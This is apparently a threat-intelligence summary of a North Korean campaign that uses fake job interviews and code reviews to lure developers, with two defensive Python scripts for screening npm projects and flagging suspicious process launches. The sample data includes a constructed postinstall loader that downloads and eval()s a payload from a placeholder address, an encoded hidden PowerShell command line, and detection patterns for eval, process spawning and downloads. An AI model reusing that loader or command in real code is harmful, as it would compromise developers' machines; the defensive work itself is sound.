Full Report
Cybersecurity researchers have flagged two malicious cyber campaigns that exhibit similarities with a persistent North Korean threat cluster known as Contagious Interview (aka Famous Chollima, HexagonalRodent, and Void Dokkaebi). According to a report published by Proofpoint, the threat actor has been found orchestrating phishing campaigns using developer role recruitment or code review themes
Analysis Summary
# Threat Actor: Contagious Interview
## Attribution & Identity
* **Primary Name:** Contagious Interview
* **Aliases:** Famous Chollima, HexagonalRodent, Void Dokkaebi
* **Attribution:** Democratic People's Republic of Korea (DPRK) / North Korean state-sponsored cluster.
* **Associations:** Commonly placed by vendors under the broader Lazarus Group umbrella; the cluster itself is characterized by revenue generation (notably cryptocurrency theft) and access to technically skilled targets rather than by a single confirmed sub-unit.
## Activity Summary
According to recent Proofpoint reporting, two malicious campaigns have been flagged whose tradecraft overlaps with this cluster. The operations leverage social engineering through professional networking and development platforms, primarily disguised as:
* **Recruitment Schemes:** Posing as recruiters or hiring managers for high-paying developer roles.
* **Technical Collaboration:** Engaging targets through "code review" requests to establish trust before delivering malware.
## Tactics, Techniques & Procedures
* **Social Engineering:** Creating legitimate-looking professional profiles on platforms like LinkedIn to approach developers.
* **Themed Phishing:** Using recruitment and interview-related lures (Job descriptions, coding tasks).
* **Malicious Code Reviews:** Sending links to repositories or files under the guise of an active technical evaluation.
* **Trust Building:** Engaging in multi-stage conversations prior to the delivery of malicious payloads.
* **Execution:** Tricking targets into downloading and running malicious software disguised as coding challenges or project environments.
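The "coding task" lure in the execution step above is usually a project the target is asked to install and run, so the practical check is to inspect it before anything executes. The following Python pre-screen is an added example, not code from this page or from Proofpoint: it flags npm lifecycle hooks in `package.json` (which `npm install` runs automatically) and JavaScript that evaluates, spawns or downloads at runtime, then combines the two into a verdict. The embedded lure and benign projects are constructed, the `203.0.113.7` address is a documentation address rather than an indicator, and the "postinstall hook that downloads and `eval()`s a payload" shape is a general assumption about how such lures execute, not a finding of the report.

```python
import json
import re

# npm runs these hooks automatically during `npm install`, before anyone
# has read the code, which is why a lure project is dangerous to "just run".
NPM_LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare", "prepublish")

# Generic indicators of code that fetches or executes something at runtime.
# They are triage heuristics, not signatures for any specific malware family.
JS_PATTERNS = {
    "dynamic-eval": re.compile(r"\beval\s*\(|\bnew\s+Function\s*\("),
    "process-spawn": re.compile(r"\bchild_process\b|\bexecSync\s*\(|\bspawn\s*\("),
    "network-fetch": re.compile(r"require\(\s*['\"]https?['\"]\s*\)|\bfetch\s*\("),
    "long-encoded-literal": re.compile(r"['\"][A-Za-z0-9+/=]{200,}['\"]"),
    "charcode-obfuscation": re.compile(r"String\.fromCharCode\s*\((?:\s*\d+\s*,){8,}"),
}


def scan_package_json(path, text):
    """Flag any lifecycle hook that would run code during installation."""
    try:
        pkg = json.loads(text)
    except json.JSONDecodeError:
        return [(path, "unparseable-package-json")]
    scripts = pkg.get("scripts") or {}
    return [(path, f"lifecycle-hook:{hook}") for hook in NPM_LIFECYCLE_HOOKS if hook in scripts]


def scan_js(path, text):
    """Flag JavaScript that evaluates, spawns or downloads at runtime."""
    return [(path, name) for name, pattern in JS_PATTERNS.items() if pattern.search(text)]


def scan_project(files):
    """files maps a relative path to its contents; returns (path, indicator) findings."""
    findings = []
    for path, text in sorted(files.items()):
        if path.endswith("package.json"):
            findings.extend(scan_package_json(path, text))
        elif path.endswith((".js", ".cjs", ".mjs")):
            findings.extend(scan_js(path, text))
    return findings


def risk_verdict(findings):
    """'block' when install-time execution is combined with eval/spawn/download."""
    kinds = {indicator.split(":")[0] for _, indicator in findings}
    runs_on_install = "lifecycle-hook" in kinds
    executes_or_fetches = bool(kinds & {"dynamic-eval", "process-spawn", "network-fetch"})
    if runs_on_install and executes_or_fetches:
        return "block"
    return "review" if findings else "ok"


# Constructed sample "coding task" in the shape of such a lure (not a real sample):
# a plausible app plus a postinstall hook that downloads and eval()s a payload.
# 203.0.113.7 is a documentation address, not a real indicator.
LURE_PROJECT = {
    "package.json": json.dumps({
        "name": "trading-dashboard-task",
        "scripts": {"start": "node server.js", "postinstall": "node lib/setup.js"},
    }),
    "server.js": 'const express = require("express");\nconst app = express();\n'
                 'app.get("/", (req, res) => res.send("ok"));\napp.listen(3000);\n',
    "lib/setup.js": 'const h = require("https");\nconst cp = require("child_process");\n'
                    'h.get("https://203.0.113.7/cfg", r => { let d = "";\n'
                    '  r.on("data", c => d += c);\n'
                    '  r.on("end", () => eval(Buffer.from(d, "base64").toString())); });\n',
}

# Constructed benign project for comparison: no hooks, nothing executed at runtime.
BENIGN_PROJECT = {
    "package.json": json.dumps({"name": "todo-api-task",
                                "scripts": {"start": "node server.js", "test": "jest"}}),
    "server.js": LURE_PROJECT["server.js"],
}

if __name__ == "__main__":
    for label, project in (("lure", LURE_PROJECT), ("benign", BENIGN_PROJECT)):
        findings = scan_project(project)
        print(label, risk_verdict(findings), findings)
```

A `review` verdict is expected for many legitimate repositories (a `prepare` hook for a git-hooks tool, a single `fetch` call in an API client), so the point of the `block` rule is the combination: code that is executed by the install step itself and that also reaches out to the network or evaluates data it did not ship with. Anything rated `review` or `block` should be opened only in a disposable environment.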
## Targeting
* **Sectors:** Technology, Software Development, Cryptocurrency, and Finance.
* **Geography:** Global (though typically focused on Western nations including the U.S. and Europe).
* **Victims:** Individual software developers, engineers, and IT professionals.
## Tools & Infrastructure
* **Malware Families:** Historically associated with remote access trojans (RATs) and information stealers; the specific variants and indicators for the two campaigns discussed here should be taken from the Proofpoint report rather than inferred from older reporting.
* **Infrastructure:**
* Professional networking sites for initial contact.
* GitHub or similar version control platforms for hosting malicious "coding tasks."
* Illustrative, defanged examples of the naming theme such lure domains tend to follow: `hxxp[:]//recruitment-portal[.]com`, `hxxps[:]//code-review-tasks[.]org`. These are placeholders for the pattern, not indicators from the Proofpoint report, and should not be added to blocklists.
## Implications
This actor represents a strategic shift where human-to-human interaction is prioritized over automated exploit delivery. By targeting developers directly, the actor aims to bypass traditional perimeter security to gain entry into corporate environments or steal high-value assets (such as cryptocurrency private keys or intellectual property). The focus on developers also suggests a possible supply chain infiltration motive.
## Mitigations
* **Security Awareness:** Educate development teams on the risks of unsolicited recruiters asking for "coding tests" that require downloading executable files or npm packages.
* **Safe Environments:** Require all external code reviews or candidate tests to be run only in disposable, isolated environments (a throwaway VM or container with no access to corporate credentials, SSH keys or cryptocurrency wallets). When the task is an npm project, install with `npm install --ignore-scripts` so lifecycle hooks such as `postinstall` cannot run before the code has been read.
* **Verify Identity:** Use out-of-band communication to verify the identity of recruiters and the legitimacy of the companies they claim to represent.
* **Endpoint Monitoring:** Alert on script interpreters (PowerShell, cmd, wscript, node, python) spawned by browsers or messaging clients, on interpreters executing content from the user's Downloads or temp directories, and on encoded PowerShell command lines; these are the process chains a downloaded "coding task" produces when it is run.
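As an added example of the endpoint monitoring point above (not code from this page or from Proofpoint), the Python routine below applies three rules to process-creation telemetry: an interpreter spawned by a browser or messaging client, an interpreter running content from a downloads or temp directory, and an encoded PowerShell command line. The records are constructed, the field names follow a Sysmon-style process-creation event, and the parent and interpreter lists are assumptions to be tuned to the environment; `node.exe` is included because the coding-task lures discussed here are npm projects.

```python
import re
from dataclasses import dataclass

# Parents from which a script interpreter should almost never be spawned on a
# developer workstation: browsers and the messaging clients used for "interviews".
BROWSER_OR_MESSENGER = {
    "chrome.exe", "msedge.exe", "firefox.exe", "brave.exe",
    "slack.exe", "discord.exe", "ms-teams.exe", "teams.exe", "telegram.exe",
}

# Interpreters and living-off-the-land binaries a downloaded "coding task" ends up in.
INTERPRETERS = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "node.exe", "python.exe", "curl.exe", "certutil.exe",
}

# Locations where browser downloads and archive extractions land.
DOWNLOAD_DIRS = re.compile(r"\\(Downloads|AppData\\Local\\Temp)\\", re.IGNORECASE)
ENCODED_POWERSHELL = re.compile(r"-(e|ec|enc|encodedcommand)\b", re.IGNORECASE)


@dataclass
class ProcEvent:
    """Minimal process-creation record (Sysmon Event ID 1 / EDR telemetry shape)."""
    parent_image: str
    image: str
    command_line: str
    user: str


def basename(path):
    """Case-folded file name of an image path, tolerant of either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(ev):
    """Return the names of every detection rule the event matches."""
    parent, child = basename(ev.parent_image), basename(ev.image)
    hits = []
    if parent in BROWSER_OR_MESSENGER and child in INTERPRETERS:
        hits.append("interpreter-spawned-by-browser-or-messenger")
    if child in INTERPRETERS and DOWNLOAD_DIRS.search(ev.command_line):
        hits.append("interpreter-running-content-from-downloads")
    if child in {"powershell.exe", "pwsh.exe"} and ENCODED_POWERSHELL.search(ev.command_line):
        hits.append("encoded-powershell")
    return hits


def triage(events):
    """Return (index, hits) for every event that matches at least one rule."""
    return [(i, evaluate(ev)) for i, ev in enumerate(events) if evaluate(ev)]


# Constructed telemetry (not real logs). Event 0 is the lure being run after a
# browser download, event 1 an encoded PowerShell stage, events 2 and 3 are
# normal developer activity that must not alert.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Program Files\Google\Chrome\Application\chrome.exe",
              r"C:\Program Files\nodejs\node.exe",
              r'"C:\Program Files\nodejs\node.exe" C:\Users\dev\Downloads\trading-dashboard-task\lib\setup.js',
              "CORP\\dev"),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
              "CORP\\dev"),
    ProcEvent(r"C:\Users\dev\AppData\Local\Programs\Microsoft VS Code\Code.exe",
              r"C:\Program Files\nodejs\node.exe",
              r'"C:\Program Files\nodejs\node.exe" C:\Projects\api\server.js',
              "CORP\\dev"),
    ProcEvent(r"C:\Users\dev\AppData\Local\slack\slack.exe",
              r"C:\Users\dev\AppData\Local\slack\slack.exe",
              "slack.exe --type=renderer",
              "CORP\\dev"),
]

if __name__ == "__main__":
    for index, hits in triage(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[index]
        print(f"event {index}: {basename(ev.parent_image)} -> {basename(ev.image)}: {', '.join(hits)}")
```

The first rule is the high-fidelity one: a browser or chat client has no business launching `node.exe` or `powershell.exe`, so it can page an analyst on its own. The downloads rule will fire on developers who genuinely run a project straight out of `Downloads`, so it is better used as a correlation signal or scored together with the other two than as a stand-alone alert.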